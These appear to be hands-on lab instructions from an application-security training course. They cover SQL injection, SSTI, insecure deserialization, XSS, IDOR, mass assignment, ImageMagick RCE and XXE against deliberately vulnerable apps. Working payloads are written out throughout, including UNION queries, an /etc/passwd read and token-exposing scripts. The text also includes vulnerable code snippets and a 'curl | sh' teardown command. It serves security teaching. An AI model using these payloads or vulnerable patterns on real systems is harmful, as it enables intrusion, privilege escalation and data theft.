
# **Lab Portal Instructions**

Lab URL : https://lab.we45.training/

Event Code for Registration : fintellix-appsec-kSXT1


# SQL Injection

>This lab exercise is for understanding SQL Injection attack through various payloads. 
#### **Lab Image : SQL-Injection**
### Instructions
---
### Attack

* Step 1: Open Terminal

* Step 2: Change to directory

```bash
cd /root/sqlinjection
```

* Step 3: Build the project

```bash
mvn package
```

* Step 4: Now start the app

```bash
docker-compose up 
```
| Wait for the app to get deployed

    > **Note:** If the startup is stuck at JAR scanning, bring down the server and spawn a new one

* Step 5: Now browse to url

```bash
http://<server-url>:8888/SQLInjection/sqli
```

Create some users

> **Note:** Replace `<server-url>` with your server url

* Step 6: In the search bar search for any user you have created based on `first name`

* Step 7: Now test for `SQL Injection` payload

```bash
' or '1=1
```

| This should return all the users you have created

* Step 8: You can also try with these payloads

    * To get mysql version

        ```
        a' UNION ALL SELECT null,version(),null,null'
        ```

        You will see a mysql version under the header `First Name`

    * To get the logged in mysql user

        ```
        a' UNION ALL SELECT null,CURRENT_USER(),null,null'
        ```

        You will see the current mysql user under the header `First Name`

    * To get the current database

        ```
        a' UNION ALL SELECT null,DATABASE(),null,null'
        ```

        You will see the database name under the header `First Name`

    * Now try other attacks (Each line is one payload)

        ```
        a' UNION ALL SELECT null,system_user(),null,null'
        a' UNION ALL SELECT null,@@GLOBAL.innodb_data_file_path,null,null'
        a' UNION ALL SELECT null,@@GLOBAL.bind_address,null,null'
        a' UNION ALL SELECT null,@@GLOBAL.version_compile_os,null,null'
        a' UNION ALL SELECT null,@@GLOBAL.version_compile_machine,null,null'
        a' UNION ALL SELECT null,@@GLOBAL.tls_version,null,null'
        a' UNION ALL SELECT null,@@GLOBAL.block_encryption_mode,null,null'
        a' UNION ALL SELECT null,@@GLOBAL.default_authentication_plugin,null,null'
        a' UNION ALL SELECT null,@@GLOBAL.hostname,null,null'
        a' UNION ALL SELECT null,@@GLOBAL.secure_file_priv,null,null'
        a' UNION ALL SELECT null,@@GLOBAL.hostname,@@GLOBAL.bind_address,CURRENT_USER()'
        a' or '1=1
        test' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,IFNULL(CAST(CURRENT_USER() AS CHAR),0x20),0x717a626a71),NULL-- YgfE
        test' UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,(CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=0x726f6f74 LIMIT 0,1)=0x59) THEN 1 ELSE 0 END),0x717a626a71),NULL-- SSao
        ```       

### Defend

* Step 1: Open browser and go to url

    ```
    http://<server-url>:8888/SQLInjection/secure
    ```

    > **Note:** Replace `<server-url>` with your server url

* Step 2: In the search bar search for any user you have created based on `first name`

* Step 3: Now test for `SQL Injection` payload

    ```
    ' or '1=1
    ```

    This should not return any value 

### Teardown

* Step 1: Change to directory 

    ```
    cd /root/sqlinjection
    ```

* Step 2: Stop the app

    ```
    curl -sSL https://raw.githubusercontent.com/we45/xml-files/master/clean-docker.sh | sh
    ```         


# Server Side Template Injection

>This lab exercise helps in exploiting a Server Side Template injection flaw on an intentionally vulnerable application.

#### **Lab Image : AppSec-Vul-Flaskk**

* Step 1: Open terminal

* Step 2: On the address bar, add `:5050/non_existent_path` and press `Enter` 

![](/img/Screenshots/lab_we45_training-VulnFlask_AddPort5050andPath.png)

* Step 3 : Replace `non_existent_path` with the following payloads and observe the results

```
    {{ config.items() }}
```

```
    {{''.__class__.mro()[2].__subclasses__()[40]('/etc/passwd').read()}}
```
* Step 4: Here is the vulnerable code snippet that contains the **SSTI** flaw. 

```python
102 def pnf(e):
103     template = '''<html>
104     <head>
105     <title>Error</title>
106     </head>
107     <body>
108     <h1>Oops that page doesn't exist!!</h1>
109     <h3>%s</h3>
110     </body>
111     </html>
112     ''' % request.url
113 
114     return render_template_string(template, dir = dir, help = help, locals = locals),404
115 

```

### Insecure Deserialization

#### **Lab Image : AppSec-Vul-Flask**

* Step 1: Open terminal

* Step 2: On the address bar, add `:5050` and press `Enter` 

![](/img/Screenshots/lab_we45_training-AppSec_Vul_Flask_AddPort5050.png)

* Step 3: Click on the `/yaml` link and notice the upload page 

![](/img/Screenshots/lab_we45_training-YAML_UploadPage.png)

* Step 4: Download related files in your local system.

```commandline
https://gist.githubusercontent.com/ti1akt/29f60611c51476dc01e302a9dfbccef0/raw/0257d1a30fc1e9d0f2bc461807d61e4584c94f5b/normal.yml
```


```commanline
https://gist.githubusercontent.com/ti1akt/96d4b196b7b1a3246682bcdc41919ba6/raw/71487f856c95e4aab1b1dfafdf7f6eec736a4070/payload.yml
```
	
* Step 5: Save the files.

* Step 6: Upload `normal.yml` and observe the result

![](/img/Screenshots/lab_we45_training-Insecure-Deserialization-normal.png)

* Step 7: Upload `payload.yml` and observe the result

![](/img/Screenshots/lab_we45_training-Insecure_Deserialization_etcPass.png)




# Reflected Cross Site Scripting
---

#### **Lab Image : AppSec-XSS**

* Step 1: Open terminal

* Step 2: On the address bar, add `:5060` and press `Enter` 

* Step 3: Click `Contact Us` icon
    * Enter a genuine value
    
    ![Reflected Based](/img/Screenshots/reflected_xss_1.png)
    
>> It will redirect into a information page
    
![Reflected Based](/img/Screenshots/reflected_xss_2.png)

* Step 4: Now we can Enter a `Reflected XSS` payload in the url header
    
![Reflected Based](/img/Screenshots/reflected_xss_4.png)

```
<script> alert(localStorage.getItem('token'))</script>
```

* Step 5: Once you enter the payload `<script>alert(localStorage.getItem('token'))</script>`

![Reflected Based](/img/Screenshots/reflected_xss_3.png)

---

# Persistent Cross Site Scripting

#### **Lab Image : AppSec-XSS**

* Step 1: Open terminal

* Step 2: On the address bar, add `:5060` and press `Enter` 

* Step 3: Click `Home` icon
    * Enter a genuine value
    
    ![Stored Based](/img/Screenshots/stored_xss_1.png)
    

* Step 4: Now we can Enter a `Stored XSS` payload

```
alert(1)
```

* Step 5: Then mouseover on the `alert(1)` text

![DOM Based](/img/Screenshots/stored_xss_2.png)

---


# DOM Based Cross Site Scripting

#### **Lab Image : AppSec-XSS**

* Step 1: Open terminal

* Step 2: On the address bar, add `:5060` and press `Enter` 

* Step 3: Click `Todo` icon
    * Enter a genuine value
    
    ![DOM Based](/img/Screenshots/dom_based_xss_1.png)
    


* Step 4 : Now we can Enter a `DOM XSS` payload

```
<a onmouseover=alert(localStorage.getItem('token'))>click me!</a>
```

* Step 5 : Then mouseover on the `click me!` text

  ![DOM Based XSS](/img/Screenshots/dom_based_xss_2.png)

---

# XSS across Contexts


## XSS - HTML Entities Context
* Step 1: Open Firefox browser

* Step 2: Access: `https://25s0e3wxk6.execute-api.us-east-1.amazonaws.com/dev/` or [click here](https://25s0e3wxk6.execute-api.us-east-1.amazonaws.com/dev/)

* Step 3: In the form, under the heading `Raw Payloads` section, enter `<script>alert(1)</script>`

```commandline
<script>alert(1)</script>
```

## XSS - HTML Attributes
* Step 1: Open Firefox browser

* Step 2: Access: `https://25s0e3wxk6.execute-api.us-east-1.amazonaws.com/dev/` or [click here](https://25s0e3wxk6.execute-api.us-east-1.amazonaws.com/dev/)

* Step 3: In the form, under the heading `Raw Payloads` section, enter `javascript:alert(document.domain)`

```commandline
javascript:alert(document.domain)
```

## XSS - JavaScript Context

* Step 1: Open Firefox browser

* Step 2: Access: `https://25s0e3wxk6.execute-api.us-east-1.amazonaws.com/dev/` or [click here](https://25s0e3wxk6.execute-api.us-east-1.amazonaws.com/dev/)

* Step 3: In the form, under the heading `Raw Payloads` section, enter `alert(document.domain)`

```commandline
alert(document.domain)
```

### Analysing the code

* Python Code

```python
def raw_render():
    if request.method == 'POST':
        if 'raw_payload' in request.form:
            print(request.form)
            resp = make_response(render_template('results.html', payload=request.form['raw_payload']))
            resp.set_cookie('someuser', 'flask')
            return resp
        else:
            return render_template('err.html', err={'error': "Invalid Data", "message": "Payload not in message"})
```

* HTML Code

```html
<html>
<head>
    <title>XSS CSP Demonstration Application</title>
</head>
<body>
<h2>XSS Demo with Multiple Contexts and Security Headers</h2>
<script src="{{ payload }}"></script>

<div>
    <h3>Results</h3>
    <p>Payload in HTML Entities (Escaped): {{ payload }}</p>
    <p>Payload in HTML Entities (Unescaped): {{ payload|safe }}</p>
    <p>Payload in HTML Attributes (escaped) <a href="{{ payload }}">Some Link</a></p>
    <p>Payload in HTML Attributes (unescaped) <a href="{{ payload|safe }}">Some Link</a></p>
    <p onclick="{{ payload }}">Payload in JavaScript Context</p>
</div>
</body>
</html>
```
---
# Insecure Direct Object Reference - AJAX (EoP)

#### **Lab Image : AppSec-WeCare**

* Step 1: Open terminal

* Step 2: On the address bar, add `:9000` and press `Enter` 

![](/img/Screenshots/lab_we45_training-AddPort9000.png)

* Step 3 : You should be able to see the WeCare Home Page. Click on the `Login` button

![](/img/Screenshots/lab_we45_training-WeCareApp_HomePage.png)

* Step 4 : Enter the following credentials 

``` commandline
  Email: betty.ross@we45.com
  Password: secdevops
```

* Step 5: Traverse to the following URL http://<`server-URL`>:9000/record/add/

![](/img/Screenshots/lab_we45_training-WeCare_AddRecords.png)

* Step 6: Open the Web Console with `Ctrl + Shift + I` or `F12` on windows and Linux, or `Command + Option + I` on MacOS.

* Step 7: Copy the following code and paste it in the web console

```javascript
function update(jsn)
 {
    $.ajax({
      type: "POST",
      url: '/update/record/',
      data: {
       rid: jsn,
       remarks : 'Injected by Betty ;)',
       csrfmiddlewaretoken: document.getElementsByName('csrfmiddlewaretoken')[0].value,
           },
     success: function(data) {
           alert(data);
          },
     error: function(xhr, textStatus, errorThrown) {
            alert("something went wrong");
            // alert(errorThrown)
          }
      });

 }
```

* Step 8: Type `update(3);` on the Console window and press Return/Enter.

```commandline
update(3);
```

* Step 9: Once it is successful, the web browser displays an alert Successfully updated test's Health Record, like indicated in the screenshot below. 

![](/img/Screenshots/lab_we45_training-WeCare_AJAXPayload.png)

* Step 10: Close the `web console window` and `logout` of the application

* Step 11: Login to the same application with the following credentials

```
Email: steve.jobs@we45.com
password: secdevops
```

* Step 12: Click on `Health Record` from the navigation panel on the left hand side

* Step 13: Now click on Health Records from the drop down list and observe the remarks column. The remarks would be the string "Injected by Betty ;)".

Check the screenshot included below. 

![](/img/Screenshots/lab_we45_training-WeCare_AJAXInjectionPrivEsc.png)

---

# Insecure Direct Object Reference - Mass Assignment


#### **Lab Image : AppSec-CTF4-Main**

* Step 1: Open terminal

* Step 2: Type the following command `http POST http://localhost:3000/users/login email=maya.williams@widget.co password=superman123`

``` commanline
http POST http://localhost:3000/users/login email=maya.williams@widget.co password=superman123
```

>>The response would look something like this

```
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Length: 248
Content-Type: application/json; charset=utf-8
Date: Tue, 20 Aug 2019 14:35:21 GMT
ETag: W/"f8-/SaeCjDqauLnaCQ8oGIAjIEiQ+M"
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Content-Type-Options: nosniff
X-DNS-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block

{
    "auth": true,
    "email": "maya.williams@widget.co",
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoibWF5YS53aWxsaWFtc0B3aWRnZXQuY28iLCJpYXQiOjE1NjYzMTE3MjAsImV4cCI6MTU2NjM5ODEyMH0.MvsWGQ4ZNQ42YME4K5CfxDN1Lk73MO6yFn2_UsHA0pg",
    "userType": "user"
}
```


>Since the user is authenticated successfully, we get an Authorization token which is a JWT token. Use the token for the following step, which is to get existing expenses associated with her account.

* Step 3: Copy the `token` value

* Step 4: Run the following command in the terminal `http GET http://localhost:3000/expenses/get_my_expenses Authorization:<paste the token>`

```commandline
http GET http://localhost:3000/expenses/get_my_expenses Authorization:<paste the token> 
```

>>The corresponding response contains a JSON string that contains various details pertaining to the expense and looks like this

```
[
    {
        "__v": 0,
        "_id": "5ace11e4b10d64111c00adb3",
        "amount": 30,
        "files": [],
        "isApproved": false,
        "merchant": "Gunrock Café",
        "name": "Dinner at Airport Food Court",
        "project": "5ace0e85b10d64111c00adb1",
        "reason": "Travel to Sacramento for Project Vulcan",
        "user": "5ace0a57b10d64111c00adad"
    },
    {
        "__v": 0,
        "_id": "5ace1635b10d64111c00adb4",
        "amount": 200,
        "files": [],
        "isApproved": false,
        "merchant": "Gigahertz",
        "name": "Car Rental Fee",
        "project": "5ace0e85b10d64111c00adb1",
        "reason": "Travel to Sacramento for Project Vulcan",
        "user": "5ace0a57b10d64111c00adad"
    }
]
```

* Step 5: Let us take the first expense ID `5ace11e4b10d64111c00adb3` and have some fun with it. Here we try and craft a response that contains the flag `isApproved=true` and observe the result.

``` commandline
http POST http://localhost:3000/expenses/update_expense/5ace11e4b10d64111c00adb3/ Authorization:<paste the token> amount=30 merchant="Gunrock Café" name="Dinner at Airport Food Court" isApproved=true
```

>>The flag `isApproved=true` has enabled the employee to approve her own expenses using the Mass Assignment flaw and creating a privilege escalation scenario. The result is displayed below.
> 

![](/img/Screenshots/lab_we45_training-CTF4MassAssignmentFlaw.png)


* Step 6: Run the following command in the terminal `http GET http://localhost:3000/expenses/get_my_expenses Authorization:<paste the token>` and check `isApproved=true` value is changes or not.

```commandline
http GET http://localhost:3000/expenses/get_my_expenses Authorization:<paste the token> 
```

* Vulnerable Code snippet.

```javascript
module.exports.updateExpense = async (req, res) => {
150     let tokenHeader = req.header("Authorization");
151     let validObject = await auth.validateUser(tokenHeader, "create_expense");
152     try {
153         if (validObject.tokenValid && validObject.roleValid) {
154             let expObj = req.params.expId;
155             Expense
156                 .findByIdAndUpdate(expObj, req.body, {new: true})
157                 .then(doc => {
158                     res.status(200).json(doc)
159                     log.info(req);
160                     log.info(res);
161                 })
162                 .catch(err => {
163                     res.status(400).json({error: err})
164                     log.error(err);
165                 })
166         } else {
167             res.status(403).json({error: "not authorized"})
168         }
169     } catch (err) {
170         log.info(err);
171         res.status(400).json({error: err})
172     }
173 };

```

---
# Insecure Image Magick Application

### **Lab Image : Image-Magick-Lab**

---

## Attack: Image magick RCE vulnerability

* Step 1: Navigate to the `Insecure` directory in `image-magick-lab`

```commandline
cd /root/image-magick-lab/Insecure
```

* Step 2: Run the insecure application that's packaged in a docker container

```commandline
docker run -d -p 5050:5050 insecure-image-magick
```

* Step 3: On the browser, access the application that's running on port `5050`

```commandline
 http://<server-url>:5050/image_uploader
```
* Step 4: Download the `rce1.png` file from [here](Downloads/Insecure_rce1.png) and Right-Click -> Save As. 
  
* Step 5: Upload the `rce1.png` image in the `/image_uploader` page and observe the results


---

# XXE

>This lab exercise is for understanding various XXE attacks. 

#### **Lab Image : XXE**

## Attack

* Step 1: Open browser and go to url

    ```
    http://<server-url>
    ```

    > **Note:** Replace `<server-url>` with your server url

* Step 2: Change to directory 

    ```
    cd /root/xxe
    ```

* Step 3: Build the project

    ```
    mvn package
    ```

* Step 4: Now start the app

    ```
    docker-compose up 
    ```

* Step 5: Open Terminal add `:8888/XXE/insecure` at the end and press enter

* Step 6: Now download required files.
    
    * `users.xml`  [click here to download](https://raw.githubusercontent.com/we45/xml-files/master/users.xml)

    * `malicious-xml.xml`  [click here to download](https://raw.githubusercontent.com/we45/xml-files/master/malicious-xml.xml)

    * `metadata-xxe.xml`  [click here to download](https://raw.githubusercontent.com/we45/xml-files/master/metadata-xxe.xml)

    or 

    ```
    https://github.com/we45/xml-files
    ```

* Step 7: Upload the `users.xml` file and you will see new users getting created in the table

* Step 8: Now test for `XXE`
    
    * Upload `malicious-xml.xml` file, you will see a password list in the table

    * Upload `metadata-xxe.xml` file, you will see a public ip address of the server
  

## Defend

* Step 1: Open browser and go to url

    ```
    http://<server-url>:8888/XXE/secure
    ```

    > **Note:** Replace `<server-url>` with your server url

* Step 2: Now test for `XXE`

    * Upload `malicious-xml.xml` file, You will see a null value in the table

    * Upload `metadata-xxe.xml` file, You will see a null value in the table

## Teardown

* Step 1: Change to directory 

    ```
    cd /root/xxe
    ```

* Step 2: Stop the app

    ```
    curl -sSL https://raw.githubusercontent.com/we45/xml-files/master/clean-docker.sh | sh
    ```         
